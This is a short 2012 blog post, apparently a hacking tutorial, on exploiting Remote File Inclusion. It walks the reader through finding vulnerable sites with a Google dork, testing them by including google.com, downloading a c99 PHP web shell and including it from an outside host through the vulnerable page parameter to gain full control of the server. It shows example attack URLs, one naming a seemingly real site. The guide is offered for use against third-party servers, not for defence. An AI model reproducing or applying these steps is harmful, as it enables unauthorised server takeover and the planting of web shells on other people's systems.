Thursday 20 December 2012

RFI Tutorial


Remote File Inclusion is the most common vulnerability found in many web servers. If the remote file execution is performed successfully, we can get control over the server and make it execute any command of our wish. So how exactly we can do that?

First we need to know the websites which are vulnerable to this, using the following google dork:

“inurl:index.php?page=”

We get number of websites listed of the form:

www.Targetsite.com/index.php?page=Anything

One by one, in place of anything, type http://www.google.com, as shown below:

http://www.Targetsite.com/index.php?...www.google.com

If the above link opens up the google homepage, then it implies the website is completely vulnerable to Remote File Inclusion.

The next step is to download a shell out of several available on the web, which is nothing but a payload in php. Most common are the c99 or r57. c99 shell can be downloaded from

http://www.4shared.com/file/10793057...tml?aff=763782

Upload the shell to a webhosting site such as ripway.com, 110mb.com etc. Now you get to see the link to this shell as:

http://h1.ripway.com/abhi/c99.txt

or something similar to this depending upon site on which the shell has been hosted.

The successful google homepage was seen in http://www.Targetsite.com/index.php?...www.google.com as I mention earlier, right? Now just remove the google part and paste the link to your shell as shown:

http://www.cbspk.com/v2/index.php?pa.../abhi/c99.txt?

Remember, the ‘?’ at the end is an important part, or the shell will not execute. So try this out, you get a complete complete control panel access to the web server. Quite easy and very much interesting.

0 comments:

Post a Comment